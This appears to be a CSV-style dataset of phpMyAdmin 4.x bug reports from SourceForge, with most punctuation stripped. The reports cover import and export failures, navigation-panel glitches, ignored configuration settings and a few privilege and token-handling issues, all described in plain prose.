I believe that going to Structure when browsing an empty table was put in place with the intention of showing at least some information, but it s confusing to be redirected to Structure after clicking on Browse.
So we should stay on Browse, with the usual message that the results set is empty.
Original URL https sourceforge.net p phpmyadmin bugs 3904 Original author lem9 Found in version 4.0.0","bug"
"24444","10298","Custom Exporting exports all databases.
exporting with custom databases option does not work expected.
All databases in exported file.
Not only the selected databases.
Original URL https sourceforge.net p phpmyadmin bugs 3905 Original author pismikrop Found in version 4.0.0","bug"
"24444","10299","Import of CSV FIle to selected table doesn t work.
Hello.
If i try to import a CSV File to specific table T of Database D, the import proceeds into Databe D, but not in my selected table T, but this process creates new table, for example named TABLE 48 and makes an import into this one.
If i repeat this procedure, it creates new temp?)
table TABLE 49 .
I have no possibility to import a file to my chosen table.
Have you any ideas?
Thanks Arnaud MySQL 5.6.10 log PHP 5.3.10 phpmyadmin 4.0.0 Server Unix and Windows) Original URL https sourceforge.net p phpmyadmin bugs 3909 Original author arnaud2013 Found in version 4.0.0","bug"
"24444","10300","cannot display Bookmarked SQL query.
when i click to view Bookmarked SQL query i got Uncaught TypeError Cannot call method split of null worked before Original URL https sourceforge.net p phpmyadmin bugs 4174 Original author freeman3 Found in version 4.0.10","bug"
"24444","10301","Export database with empty table as a php array, does not produce valid PHP.. Exporting a database with empty tables to a PHP array creates a PHP parse error in the code.
It seems that empty tables print a closing paren ); .
I have created this in PMA 4.0.0, and the 4 RC s before it.
Original URL https sourceforge.net p phpmyadmin bugs 3910 Original author timcrider Found in version Latest Git","bug"
"24444","10302","Filtering database names includes empty groupings.
When searching for a database using the filter box, groups aren t removed if they are empty.
For example If I have these tables my firstdb my seconddb client database client other It groups them by my client When I search for say other it will show my client client other It still shows my even though there s nothing under it.
Original URL https sourceforge.net p phpmyadmin bugs 3911 Original author phazei Found in version 4.0.0","bug"
"24444","10303","Quick edit for BIT type doesn t work.
Exactly as the title says, using the quick edit to modify BIT columns of any length doesn t work using the quick edit, however you are able to modify the value if you click on the Edit button for that row and do it the normal way.
With the quick edit, you get the following error 0 rows affected.
Warning 1264 Out of range value for column bit test at row 1 Tested using versions 4.2.0 dev 3.5.2 Original URL https sourceforge.net p phpmyadmin bugs 4178 Original author mikerobinson Found in version 4.1.1","bug"
"24444","10304","Exporting row selection after ORDER BY.
Bug 3797 https sourceforge.net p phpmyadmin bugs 3797 is still in Git ce94d11 committed on May 06, 2013 at 05 14.
To reproduce a minor change to the testcase is needed.
Run this in SQL tab DROP TABLE IF EXISTS t1; CREATE TABLE t1 id INT UNIQUE); INSERT INTO t1 VALUES 1); SELECT FROM t1 ORDER BY id; Select the row.
Click Export.
Click OK. Now we get error 1064 because of the ORDER BY line before the WHERE clause SELECT FROM t1 ORDER BY id WHERE t1.id =1) ORDER BY id Original URL https sourceforge.net p phpmyadmin bugs 3912 Original author julianladisch Found in version Latest Git","bug"
"24444","10305","Table search returns empty result.
After upgrading from pma 3.5 to 4.0 some sql queries do not work anymore.
I am using pma on a freebsd 9.1 machine with an up to date portstree, mysql 5.5, apache 2.2 and php 5.4.
The apache server has been completely restarted and browser cache was emptied after the upgrade.
On certain queries there is just no result.
To reproduce this, you can create a table with the sql statements from attachment sql create table.txt When doing a simple search query like SELECT FROM `Members` WHERE `Id` =1 the result looks like screenshot working.png and everything is fine.
But if I call this query SELECT FROM `Members` WHERE `Callsign` LIKE GA it won t work and I get an output like in screenshot defective.png.
This appears right after submitting the search form when I just use GA as search pattern for the `Callsign` column.
There is no error message or anything else giving me at least a hint on how to troubleshoot this.
It always seems to be broken as soon as I search for anything in the `Callsign` column.
I did some debugging with Firebug.
I have attached a working AJAX communication in ajax post working.txt and ajax reply working.txt.
In contrast ajax post defect.txt and ajax reply defect.txt are broken.
However I cannot see any big difference in those two requests.
If I can provide you any further details or information in case you cannot reproduce this, please let me know.
regards David Original URL https sourceforge.net p phpmyadmin bugs 3913 Original author dfroe Found in version 4.0.0 Attachment http sourceforge.net p phpmyadmin bugs 3913 attachment sql create table.txt","bug"
"24444","10306","Session Expired; Fatal Javascript Components Not Defined.
Can t find this bug issue already entered at all.
Upon upgrade to 4.1.0, I suddenly start to get weird behaviors 1 From PMA login page, I always get the Your Session has Expired, please login again overlay.
Even after clearing all browser history, cache, etc.
Also cleared server session data.
2 Dismissed window, logged in.
I now get a pink bar across the bottom saying A fatal JavaScript error has occurred.
Would you like to send an error report?
I try to send the report, but it fails trying to send and suggests I fill out a ticket.
Here s the data from the report { exception { mode onerror , message ReferenceError Components is not defined , stack [ { line 7 , func ?
, uri ?
, scriptname null } ], useragent Mozilla 5.0 Windows NT 6.1; WOW64; rv 26.0) Gecko 20100101 Firefox 26.0 , uri index.php?
}, script name index.php , pma version 4.1.0 , browser name FIREFOX , browser version 26.0 , user os Win , server software Apache 2.2.21 Win32) mod ssl 2.2.21 OpenSSL 1.0.0e mod wsgi 3.3 Python 2.7.2 , user agent string Mozilla 5.0 Windows NT 6.1; WOW64; rv 26.0) Gecko 20100101 Firefox 26.0 , locale en , configuration storage enabled , php version 5.4.3 , microhistory { pages [ { hash index.php?db= table= server=1 target= token=dcab89b4c6d5a6fdbe41683c35548d45 } ], current index 1 } } More info I was running Firefox 25.1 which also failed, so I upgraded to current 26.0) which also fails.
4.1.0 works fine in IE 11.0.9600.16476 on the same computer.
4.1.0 works fine in Firefox 26.0 from a different computer.
I also tried reverting back to PMA 4.0.9, logging in, logging out, and then upgrading again.
Still the error messages.
Original URL https sourceforge.net p phpmyadmin bugs 4182 Original author dlernstrom Found in version 4.1.0","bug"
"24444","10307","Replication broken when using cross database master slave config and phpmyadmin.
Phpmyadmin queries are not aware of the cross database replication.
When you use report host=master.codeone replicate rewrite db = db >db slave replicate do db = db slave replicate do table = db slave.table1 in mysql config and try to add delete update record using pma, you are toasted your replication goes nuts.
It s because pma creates queries in format a such insert ...) into `db`.`table1` and since there is no database db on slave machine your query is not replicated you get error on slave machine.
The same applies to cross database replication on the same machine.
Original URL https sourceforge.net p phpmyadmin bugs 3914 Original author fliespl Found in version Latest Git","bug"
"24444","10308","Import of CSV FIle Replace table data with file) with duplicate values.
Hello.
It s impossible to import duplicate values into table with unique key, although Replace table data with file was selected.
It will be missed IGNORE keyword in INSERT statement.
Version information 4.1 dev, latest stable version 4.0.0 Original URL https sourceforge.net p phpmyadmin bugs 3915 Original author arnaud2013 Found in version 4.0.0","bug"
"24444","10309","Missing scrollbar original theme).
As reported by Reindl Harald in phpmyadmin users, there is no vertical scrollbar in the navigation panel when using the original theme.
Original URL https sourceforge.net p phpmyadmin bugs 3916 Original author lem9 Found in version 4.0.0","bug"
"24444","10310","CountTables seems broken.
It seems as if the [CountTables] http docs.phpmyadmin.net en latest config.html cfg Servers CountTables) configuration option doesn t work anymore.
Git tells me the first bad commit was 69b81e Added ajax loaded navigation to the main page by Rouslan, although I got a blank page during my git bisect so wasn t able to test that particular revision.
Original URL https sourceforge.net p phpmyadmin bugs 3917 Original author ibennetch Found in version 4.0.0","bug"
"24444","10311","Greyed out tabs when there are no rows.
To be fixed in master, for 4.1).
When phpMyAdmin thinks that there are no rows in a table, some tabs I noticed Browse and Search) are greyed out.
However they can still be clicked, because by the time the page has been displayed, another process might have written some rows to this table.
But clickable greyed out tabs is confusing for some users.
So, for 4.1, these tabs should not longer be greyed out.
Original URL https sourceforge.net p phpmyadmin bugs 3918 Original author lem9 Found in version 4.0.0","bug"
"24444","10312","PropertiesIconic not honored.
Setting cfg[ PropertiesIconic ] doesn t seem to have any effect.
Original URL https sourceforge.net p phpmyadmin bugs 3919 Original author ibennetch Found in version 4.0.0","bug"
"24444","10313","Call to undefined function PMA isSuperuser ) if default server is not set.
Occurs only if ServerDefault is set to 0 choose server).
Fatal error Call to undefined function PMA isSuperuser ) in var www hosts serverpilot phpMyAdmin 4.0.0 all languages libraries Menu.class.php on line 434 Commenting line 434 causes Call to undefined function PMA DBI fetch result some lines later, looks like there is a problem with the order of the includes.
Original URL https sourceforge.net p phpmyadmin bugs 3921 Original author oliwel Found in version 4.0.0","bug"
"24444","10314","User privileges wildcards unescaped in db names.
The fix that was applied for bug 3827 breaks important functionality.
Because the table names are now un escaped mysql actually interprets the wildcards!
This occurs for both the tables from the select eg my db) as the manually entered filter eg.
).
PMA now unescapes these sequences; leading to unwanted behaviour users having access to my db will have access to myDdb as well users having access to will have access to any table instead of just tables with underscores) This will lead to security related problems.
Original URL https sourceforge.net p phpmyadmin bugs 3922 Original author spider 007 Found in version 4.0.0","bug"
"24444","10315","Import with nginx php fpm fails with 504 Gateway Timeout.
I ve upgraded from 3.5.8 to 4.0.0 and now if I try to import a gzipped export file that i created from another PMA installation, I get a 504 Gateway Timeout even though the file is very small.
If i downgrade to 3.5.8 again, the same file is importet in less than 5 s. I ve tested in both, Chrome and Firefox.
The MySQL version is 5.5.31 0ubuntu0.12.10.1 log Ubuntu).
The only log output is 2013 05 11 10 40 11 [error] 13561 0 34069 upstream timed out 110 Connection timed out) while reading response header from upstream, client .
.
.7, server ssl.
.de, request GET pma import status.php?message=true token= HTTP 1.1 , upstream fastcgi 127.0.0.1 9000 , host ssl.
.de , referrer https ssl.
.de pma index.php?token= Original URL https sourceforge.net p phpmyadmin bugs 3923 Original author stoffldick Found in version 4.0.0","bug"
"24444","10316","Show warning when CSV file does not contain data for all columns.
Import of CSV file in 4.0.1 RC1 does not work, just returns the import page again.
Original URL https sourceforge.net p phpmyadmin bugs 3924 Original author stuchalk Found in version 4.0.1","bug"
"24444","10317","Sorting columns wipes column comments.
Original URL https sourceforge.net p phpmyadmin bugs 4193 Original author bmn13 Found in version 4.0.0","bug"
"24444","10318","Table sorting in navigation panel is case sensitive.
When a database contains uppercase and lowercase table names, the uppercase tables appear first in the navigation panel.
The db structure page has the correct order, case insensitive.
Original URL https sourceforge.net p phpmyadmin bugs 3925 Original author mynetx Found in version 4.0.1","bug"
"24444","10319","View is not updatable.
Since the new validation that produces the message This table does not contain a unique column.
Grid edit, checkbox, Edit, Copy and Delete features are not available.
, implemented to fix bug 3672, a simple view containing the primary key is no longer updatable.
Original URL https sourceforge.net p phpmyadmin bugs 3926 Original author lem9 Found in version 4.0.1","bug"
"24444","10320","List of tables is missing after expanding in the navigation frame.
In some cases, the expanded table is not shown in the list.
The problem occurs when table definition have comment with a special character in my case Polish).
example CREATE TABLE IF NOT EXISTS `client list` `id` int 10) unsigned NOT NULL auto increment COMMENT PK , `name` varchar 255) collate utf8 polish ci NOT NULL COMMENT Nazwa listy , PRIMARY KEY `id`), KEY `name` `name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8 polish ci COMMENT= Przykxc5x82adowy tekst xc5x82xc5x84xc3xb3xc5x9bxc4x87 AUTO INCREMENT=1 ; Except the missing list, app not display any other message, also not have any entry in the log.
When you click on the symbol JSON returns { message null, success true} A temporary workaround is to set in confg file cfg[ ShowTooltip ] = false; Original URL https sourceforge.net p phpmyadmin bugs 3927 Original author raven77 Found in version 4.0.0 Attachment http sourceforge.net p phpmyadmin bugs 3927 attachment phpmyadmin navigation problem.JPG","bug"
"24444","10321","Designer not working.
Hello, <b>Text in English < b> When I create a relationship between the designer about 2 tables, opens after selecting the primary and secondary key just a pop.
Then the compound is not set.
In any version of the design work time with me, but now no longer.
On multiple PCs in the same error, whether with Firefox, Chrome, Internet Explorer ... etc.
Is aware of the problem and is there maybe a solution?
Or do I have something installed for it?
Thanks in advance!
<b>Text in German < b> Wenn ich eine Beziehung zwischen 2 Tabellen xc3xbcber den Designer erstelle, xc3xb6ffnet sich nach dem Auswxc3xa4hlen des Primxc3xa4r und Sekundxc3xa4rschlxc3xbcssels nur ein Popup.
Die Verbindung wird dann nicht gesetzt.
In irgendeiner Version funktionierte der Design mal bei mir, doch nun gar nicht mehr.
Auf mehreren PCs der gleiche Fehler, egal ob mit Firefox, Chrome, Internet Explorer... etc.
Ist das Problem bekannt und gibt es vielleicht eine Lxc3xb6sung?
Oder muss ich irgendwas installiert haben, damit es geht?
Danke im Voraus!
Original URL https sourceforge.net p phpmyadmin bugs 3928 Original author dennis1993 Found in version 4.0.0","bug"
"24444","10322","Database specific privileges are not copied when cloning user.
When cloning an existing user creating a copy with updated hostname), database specific privileges are not copied over, despite the page saying with the same privileges.
Steps 1.
Open Users.
2.
In a row, click Edit privileges for a user having database specific privileges.
3.
Scroll way down, update the hostname and Save.
4.
Inspect the new users privileges.
Expected The new user has the same database rights as the existing one.
Actual The new user has no database rights.
Original URL https sourceforge.net p phpmyadmin bugs 3929 Original author mynetx Found in version 4.0.6","bug"
"24444","10323","Databases to choose for specific privileges show up escaped.
See photo.
Original URL https sourceforge.net p phpmyadmin bugs 3930 Original author mynetx Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 3930 attachment db privs escaped.jpg","bug"
"24444","10324","Import using Opera no longer work.
I am running apache 2.4.4, php 5.4.15 mod ruid2) and mysql 5.5.31 After upgrade to the latest phpmyadmin 4.0.0, importing a database in phpmyadmin using Opera browser, does not work anymore.
There is no errors, it just hangs on the page loading text The file is being processed, please be patient.
However when I test the same using Firefox, then importing the databse work without any problems.
Please test import in phpmyadmin 4.0.0 using Opera browser, so that you can confirm this, and hopefully have a fix out soon.
Thanks!
Original URL https sourceforge.net p phpmyadmin bugs 3932 Original author aommundsen Found in version 4.0.0","bug"
"24444","10325","List of changes link doesn t work.
In the PMA install s home, clicking the List of changes link causes PMA to go through authentication again in a new tab) and then just displays the server s home, rather than the changelog.
Original URL https sourceforge.net p phpmyadmin bugs 3934 Original author paour1 Found in version 4.0.1","bug"
"24444","10326","Table Header not displayed correct Safari 5.0.5 Mac).
Browser Safari 5.0.5 Mac 6533.21.1), tested on three different clients with Safari 5.0.5 Problem not existant with Chrome 27.
Table Headings are misplaced as shown in the attached PDF.
When changing the col order they get even more misplaced page 2 in PDF).
Original URL https sourceforge.net p phpmyadmin bugs 3935 Original author emale999 Found in version 4.2.9 Attachment http sourceforge.net p phpmyadmin bugs 3935 attachment phpMyAdmin4 th.pdf","bug"
"24444","10327","Reloading user privileges hides user groups submenu.
When you open the Users overview in server mode, you see a submenu Users overview User groups .
This submenu is hidden when you reload the page by pressing [F5].
Original URL https sourceforge.net p phpmyadmin bugs 4204 Original author mynetx Found in version 4.1.0","bug"
"24444","10328","Query profiler chart not loading from SQL Query page.
When executing a query from the SQL query page tbl sql.php), the query profile chart is not displayed.
If you hit the refresh button on the page, it gets drawn after the ajax request returns.
I m not 100 sure, but it looks like the problem is that the required js for the chart doesn t get loaded before it s needed the first time the query is run.
After you hit the refresh button and the ajax request returns, the needed js files are loaded, allowing the chart to be drawn.
I will be submitting a pull request soon for feature request 1363 which improves the query profiler and adds sorting to the profiler results tables.
The sorting for the tables also does not get loaded for the same reason that the chart is not drawn.
Original URL https sourceforge.net p phpmyadmin bugs 3936 Original author gnugget0 Found in version 4.0.1","bug"
"24444","10329","PDFDefaultPageSize doc and easy configurability.
the PDFDefaultPageSize config var is not in the docs.
us dumb americans like it to be letter instead of the default of A4 .
it even seems like putting it into the config.sample.inc.php file would be nice.
Original URL https sourceforge.net p phpmyadmin bugs 3938 Original author q7joey Found in version 4.0.1","bug"
"24444","10330","PHP NavigationTree error when paging through list.
We ve got a couple database servers with a a lot of databases 600 ).
Setting MaxNavigationItems to something high like 500 displays the PHP error below.
Lowering it to something like 100 allows the page to load, if you start paging through the list you ll eventually get the same error.
Lowering it more will cause the error to appear at an even later page.
Even the default will display the error at some point.
Not sure if it matters but most of the databases are grouped eg.
projectname dev and projectname staging).
MySQL servers with fewer databases 125) do not exhibit the problem at all.
! )
Fatal error Call to a member function getPresence ) on a non object in var ... libraries navigation NavigationTree.class.php on line 1046 Call Stack Time Memory Function Location 1 0.1505 11898000 PMA OutputBuffering stop ) .. OutputBuffering.class.php 0 2 0.1505 11876568 PMA Response response ) .. OutputBuffering.class.php 117 3 0.1506 11876568 PMA Response > htmlResponse ) .. Response.class.php 370 4 0.1506 11876568 PMA Response > getDisplay ) .. Response.class.php 273 5 0.1506 11876568 PMA Header >getDisplay ) .. Response.class.php 260 6 0.1514 11884536 PMA Navigation >getDisplay ) .. Header.class.php 367 7 0.1525 11890288 PMA NavigationTree >renderState ) .. Navigation.class.php 54 8 1.4586 15630280 PMA NavigationTree > renderNode ) .. NavigationTree.class.php 646 9 1.4590 15643216 PMA NavigationTree > renderNode ) .. NavigationTree.class.php 973 10 1.4623 15658720 PMA NavigationTree > fastFilterHtml ) .. NavigationTree.class.php 980 Apache 2.2.9 Debian) PHP 5.2.6 1 lenny16 Original URL https sourceforge.net p phpmyadmin bugs 3939 Original author pb30 Found in version 4.0.9","bug"
"24444","10331","Content Security Policy errors with Safari 5.1.
Using Safari 5, images are not displayed and Safari reports Content Security Policy errors.
Error text .
.
.
.
.
.
.
.
.
.
.
Configurations tested bad Windows XP and Safari 5.1.7 Mac OS 10.6.8 and Safari 5.1.9 Safari 5 is the most recent version available for Windows and older architecture Mac computers.
Initially reported on IRC by brightbeat Original URL https sourceforge.net p phpmyadmin bugs 3940 Original author ibennetch Found in version 4.0.1","bug"
"24444","10332","Recent tables list always empty.
I ve upgraded phpmyadmin from 3.5.8 to 4.0.0 4.0.1, but the recent tables drop down list is always empty.
It worked fine with previous versions.
The only change I ve made is the renaming of phpmyadmin storage tables, renamed as suggested from pma to pma two underscore), changing accordingly the privileges of the pma control user.
Looking at the pma recent table, it has no records.
Original URL https sourceforge.net p phpmyadmin bugs 3941 Original author minnoce Found in version 4.0.1","bug"
"24444","10333","Clicking on the logo fails.
Clicking on the phpMyAdmin logo should go back to the script configured in cfg[ NavigationLogoLink ].
The default is index.php and the intention was to go back to the home page.
Now in some situations, it goes back to some other db and table that was visited during the session.
Original URL https sourceforge.net p phpmyadmin bugs 4211 Original author lem9 Found in version 4.1.3","bug"
"24444","10334","Missing Operations>Table options>AUTO INCREMENT.
From Derek Tatum Has the Operations > Table Options > AUTO INCREMENT field been removed from phpMyAdmin?
Now that I ve upgraded to 4.0.0, I can no longer find it.
Older versions, such as 3.5.1, have it though.
I even tested on the Official Demo http demo.phpmyadmin.net master config ), but experienced the same issue.
Original URL https sourceforge.net p phpmyadmin bugs 3943 Original author lem9 Found in version 4.0.1","bug"
"24444","10335","Datetime Quick Edit decrements by one day.
When quick editing a timestamp or datetime field, the time is decremented by 1 day.
So if I edit this date 2014 01 03 11 34 37.000000 It ends up being 2014 01 02 11 34 37.000000 Pressing esc cancels the change, clicking on the correct date selects the correct date.
Clicking outside of the textarea does not apply a change if the date is modified to be the original date time.
No JS errors If I edit the field normally it works correctly.
Version info Server Localhost via UNIX socket Server type MySQL Server version 5.6.15 MySQL Community Server GPL) Protocol version 10 Server charset UTF 8 Unicode utf8) Apache 2.2.24 Unix) DAV 2 PHP 5.4.17 mod ssl 2.2.24 OpenSSL 0.9.8y Database client version libmysql mysqlnd 5.0.10 PHP extension mysqli phpMyAdmin version 4.1.3 OS OS X 10.9.1 Browser Safari Mozilla 5.0 Macintosh; Intel Mac OS X 10 9 1) AppleWebKit 537.73.11 KHTML, like Gecko) Version 7.0.1 Safari 537.73.11) This happens in Firefox Mozilla 5.0 Macintosh; Intel Mac OS X 10.9; rv 26.0) Gecko 20100101 Firefox 26.0) as well.
Original URL https sourceforge.net p phpmyadmin bugs 4213 Original author ururk Found in version 4.1.3","bug"
"24444","10336","DisableIS configuration setting ignored in navigation panel since 4.0.0.
The DisableIS configuration setting is ignored since version 4.0.0 in the navigation panel perhaps other places also).
This has significant performance considerations in large shared hosting environments where there are many databases and tables.
Original URL https sourceforge.net p phpmyadmin bugs 3944 Original author candev Found in version 4.0.0","bug"
"24444","10337","ShowDatabasesCommand configuration setting ignored in navigation panel since 4.0.0.
The ShowDatabasesCommand configuration setting is ignored since version 4.0.0 in the navigation panel perhaps other places also).
This has significant performance considerations in large shared hosting environments where there are many databases and tables.
Original URL https sourceforge.net p phpmyadmin bugs 3945 Original author candev Found in version 4.0.0","bug"
"24444","10338","Missing CSV import option Do not abort on INSERT error .
The option was there in 3.5.x Original URL https sourceforge.net p phpmyadmin bugs 3946 Original author lem9 Found in version 4.0.1","bug"
"24444","10339","Missing Sql Query after modify structure.
After we modify a table structure we don t see anymore the query the phpMyAdmin did.
Original URL https sourceforge.net p phpmyadmin bugs 3947 Original author jfdionne Found in version 4.0.1","bug"
"24444","10340","Table list left panel) does not reload when table renamed.
To reproduce 1.
Click a DB in the left panel, then select a table.
2.
Go to Operations and rename the table.
The old table name is still shown in the left panel, and clicking it shows an error 1146 Table tablename doesn t exist .
I have also come across other situations where the table list doesn t refresh, if I can pin down the reasons I ll add them here.
Original URL https sourceforge.net p phpmyadmin bugs 4219 Original author svivian Found in version 4.1.3","bug"
"24444","10341","Server export problems.
When exporting at the server level, 1) information schema and performance schema should not be displayed in the Databases list 2) if no database is selected from the list, the exporting behaves as if all had been selected Original URL https sourceforge.net p phpmyadmin bugs 3948 Original author lem9 Found in version 4.0.1","bug"
"24444","10342","Parse error in advisor.
Seen on demo server PHP Parse error syntax error, unexpected long query time T STRING) in libraries Advisor.class.php 351) eval ) d code on line 1 Original URL https sourceforge.net p phpmyadmin bugs 3949 Original author nijel Found in version Latest Git","bug"
"24444","10343","MaxExactCount doesn t work.
I have phpmyadmin with nginx 1.4.2 phpmyadmin 4.0.9 mysql percona 5.5 php 5.4 I have this configuration in config.inc.php cfg[ MaxExactCountViews ] = 0; cfg[ MaxExactCount ] = 0; When I click on table of db , phpmyadmin makes this query SELECT COUNT ) FROM `bd`.`table` I need these querys are fast, as the tables are very large i have slowly problems I can change this method?
Original URL https sourceforge.net p phpmyadmin bugs 4222 Original author ricardozd Found in version 4.0.9","bug"
"24444","10344","Inconsistent sorting of table names in navigation tree view and databas structure view.
We have tables named like tbloldstylenaming tbl new style naming In 4.0.1, the navigation tree slow to popuplate I find too) shows the tables in the following order in the table part of the navigation tree tbl new style naming tbloldstylenaming In 4.0.1, database structure page shows the tables in the following order tbloldstylenaming tbl new style naming Multiply that up to about 120 tables in the database and it gets very confusing working with the tables listed in different orders.
I can get used to one way or the other so long as it s consistent like it used to be in versions < 4.0.0.
Original URL https sourceforge.net p phpmyadmin bugs 3950 Original author wanderingzombie Found in version 4.0.0","bug"
"24444","10345","Unable to change database server in 4.0.1 Chrome on Mac).
I recently upgraded to 4.0.1 from a pre 4.0 version on a server with a config file that contains multiple servers.
The select server drop down is now in the left column, but it does nothing when I change the server.
If I look at the console log in Chrome, I m getting an error each time I change the server selection that says Cannot set property innerText of null Original URL https sourceforge.net p phpmyadmin bugs 3951 Original author jdavidbakr Found in version 4.0.1","bug"
"24444","10346","Unable to load tables list in left panel.
I found a bug, when no tables list is loading in left panel after clicking the plus button at the database name.
How to reproduce?
It is simple.
Just create any amounts of tables in the specific DB, where at least one table have a commentary with the Russian language sorry, not tested with any other languages but Russian and English).
Voilxc3xa0!
No tables list in the left panel, the plus button show no tables tree.
Original URL https sourceforge.net p phpmyadmin bugs 3952 Original author zlomovsky Found in version 4.0.1","bug"
"24444","10347","Missing the tooltip popup on the table tree.
The tooltips popup we had when you put your mouse over a table on the left panel is missing, it was showing the current number of rows into this table.
Original URL https sourceforge.net p phpmyadmin bugs 3953 Original author jfdionne Found in version 4.0.1","bug"
"24444","10348","Rows not select automaticly when Grid editing is disabled.
When the Grid editing is disabled if you click on the row the checkbox doesn t get checked like in version < 4.0.0 Original URL https sourceforge.net p phpmyadmin bugs 3954 Original author jfdionne Found in version 4.0.1","bug"
"24444","10349","Enum with umlauts break editing.
If you create a table with for example 5 fields and have one of them an enum with for example the values foo , bar , foobar , bxc3xa4r you can no longer edit a whole record.
It will stop rendering the edit fields after the enum value foobar .
Even the value bxc3xa4r is not added to the dropdown.
The footer of the table is added to the edit table, so you can save your record.
see attachment).
Original URL https sourceforge.net p phpmyadmin bugs 3955 Original author dl7tny Found in version 4.0.2 Attachment http sourceforge.net p phpmyadmin bugs 3955 attachment Bildschirmfoto 202013 05 23 20um 2010.04.57.png","bug"
"24444","10350","Token mismatch when using HTTP AUTH and the SESSION expires.
I m using PMA 4.1.4, PHP 5.5 and been having this issue since the release of PMA 4.x.
I m using HTTP authentication, and whenever my SESSION expires whether after some idle period or by deleting the phpmyadmin SESSION cookie), clicking on anything triggers a Error Token Mismatch error, which can only be fixed by clearing the URL removing the hashtag) and reloading the page so a new token is generated).
This is VERY annoying, because whenever my SESSION expires I have to change the URL and reload PMA, which makes no sense since I m still HTTP authenticated.
IMHO, when PMA gets a token mismatch, it should check if the HTTP auth info is still correct, and if it is, update the token and move on like nothing happened... Steps to reproduce 1) Use HTTP auth on settings 2) Sign in to PMA 3) Expire your SESSION leaving PMA go idle for a while or deleting the phpmyadmin SESSION cookie) 4) Click anywhere try to browse, show structure, change DB, anything really) 5) Notice the Error Token Mismatch error and how you can only get rid of it by clearing the URL and reloading the page Original URL https sourceforge.net p phpmyadmin bugs 4227 Original author guaycuru Found in version 4.1.4","bug"
"24444","10351","Browse Foreign Values search filter is not working.
In 4.0.1 stable, when inserting a row with a foreign key and clicking on Browse Foreign Values the popup form is showing only one page and the search box does nothing.
This is in Chrome 23.0.1271.60 Original URL https sourceforge.net p phpmyadmin bugs 3956 Original author jdavidbakr Found in version 4.0.1","bug"
"24444","10352","cookies must be enabled .... my browser is set to accept cookies, however phpmyadmin tells me that is not doesn t want to accept cookies ... ) i tried to use setup ... but then again when i tried to create new server nothing happened because i m not accepting cookies ... tried with firefox and chrome both linux, not that it matters ... ) Original URL https sourceforge.net p phpmyadmin bugs 3957 Original author cybernet2u Found in version 4.0.2 Attachment http sourceforge.net p phpmyadmin bugs 3957 attachment Screenshot 9.png","bug"
"24444","10353","Export problems.
Export problems.
When you click on the Export Error net ERR FILE NOT FOUND) Could not find the file or directory.
MYSQL 5.1.63 PHPMYADMIN 4.0.2 Original URL https sourceforge.net p phpmyadmin bugs 3958 Original author toxi22 Found in version 4.0.2","bug"
"24444","10354","Using DefaultTabDatabase in NavigationTree for Database Click.
Hi, the Configuration Directive DefaultTabDatabase is not used in the left NavigationTree when clicking on Database Name using Grouping.
Also when opening the Database tree and clicking the Word Tables DE Tabellen) or the Word Views DE Ansichten) there should also be used the Configuration Directive DefaultTabDatabase for the text and or NavigationTreeDefaultTabTable for the icon, and not the static filename db structure.php.
Regards Oksi Original URL https sourceforge.net p phpmyadmin bugs 3959 Original author dj marty Found in version 4.0.2","bug"
"24444","10355","NavigationBarIconic config not honored.
Whatever I set cfg[ NavigationBarIconic ] to, the top bar right panel ) always uses icons only.
I tried setting this in config.inc.php and with the web interface, to no avail.
This was fine in 4.0.1.
Original URL https sourceforge.net p phpmyadmin bugs 3960 Original author paour1 Found in version 4.0.2","bug"
"24444","10356","HTTP Referer disclosure in SQL links.
See https stackoverflow.com questions 21096262 possible exploit in phpmyadmin links http dev mysql com for details; the generated links resulting after running an SQL query can contain the URL token in the HTTP Referer.
Marc said A more simple solution would be to generate links to url.php without the token, and have a domains whitelist inside url.php.
Original URL https sourceforge.net p phpmyadmin bugs 4237 Original author ibennetch Found in version Latest Git","bug"
"24444","10357","Avoid Suhosin warning when in simulation mode.
The Suhosin warning appears correctly, but if you disable Suhosin with the PHP Flag suhosin.simulation = On it s still there.
I think the warning is no longer needed, because in the documentation it says When Suhosin runs in simulation mode, violations are logged as usual, but nothing is blocked or removed from the request.
.
See http www.hardened php.net suhosin configuration.html suhosin.simulation Original URL https sourceforge.net p phpmyadmin bugs 3961 Original author sagitta1793 Found in version 4.0.2","bug"
"24444","10358","Import using https does not work.
I am running apache 2.4.4, php 5.4.15 mod ruid2) and mysql 5.5.31 The problem started from phpMyAdmin version 4.0.0.
I am now running phpMyAdmin 4.0.2 When using phpMyAdmin 4.0.2 over https, I can t import databases using newest version of Chrome, Internet Explorer and Opera.
It seems to work in Firefox.
There is no visible errors, but when try to import it just hangs on the page loading text The file is being processed, please be patient.
Nothing more happens, and nothing is uploaded.
As soon as I don t use https, then import of database work immediately!
To conclude Import over https does not work in Chrome, Internet Explorer and Opera, but seem to work in Firefox.
When not using https it works immediately.
Please let me know if you need more information.
I hope you will test import in https soon to confirm the bug.
This creates a lot of trouble for us, because we offer shared webhosting, and there is a lot of customers contacting us with this problem.
Original URL https sourceforge.net p phpmyadmin bugs 3964 Original author aommundsen Found in version 4.0.2","bug"
"24444","10359","Default language wrong with zh TW.
Default accept language for Chrome on a traditional Chinese Windows machine is Accept Language zh TW,zh;q=0.8,en US;q=0.6,en;q=0.4 However, the default language selected by phpMyAdmin is simplified Chinese which is wrong.
I think there is something wrong in the file select lang.lib.php.
Original URL https sourceforge.net p phpmyadmin bugs 3965 Original author benck Found in version 4.0.3","bug"
"24444","10360","Footer not included in AJAX loaded pages.
The file config.footer.inc.php is included only in first page loaded, further ones loaded by AJAX do not include it.
Original URL https sourceforge.net p phpmyadmin bugs 3967 Original author nijel Found in version Latest Git","bug"
"24444","10361","Database filter does not hide groups.
If you group your databases and try to filter, it does not hide empty groups.
Original URL https sourceforge.net p phpmyadmin bugs 3969 Original author lord rod Found in version 4.0.3","bug"
"24444","10362","initial Browse query does not match sorting order.
phpMyAdmin stores the order of each table per user.
So when the user browses a table, the sort order is used from user preferences.
The problem here is that the initial query does not reflect the search order.
1.
Browse a table.
The query shown will be SELECT FROM `table` .
2.
Sort by column `col`.
the query shown will be SELECT FROM `table` ORDER BY `table`.`col` ASC .
3.
Leave the table and re enter it or directly hit Browse again from top navigation.
4.
The query show is the same as in 1.
But the records are sorted according to the stored user preferences as resulting from 2.
I expect the GUI and the result set to be syncronised, regarding shown query and record order, even initially.
Original URL https sourceforge.net p phpmyadmin bugs 4245 Original author ci dev Found in version 4.1.5","bug"
"24444","10363","Pressing enter in the filter field reloads page..
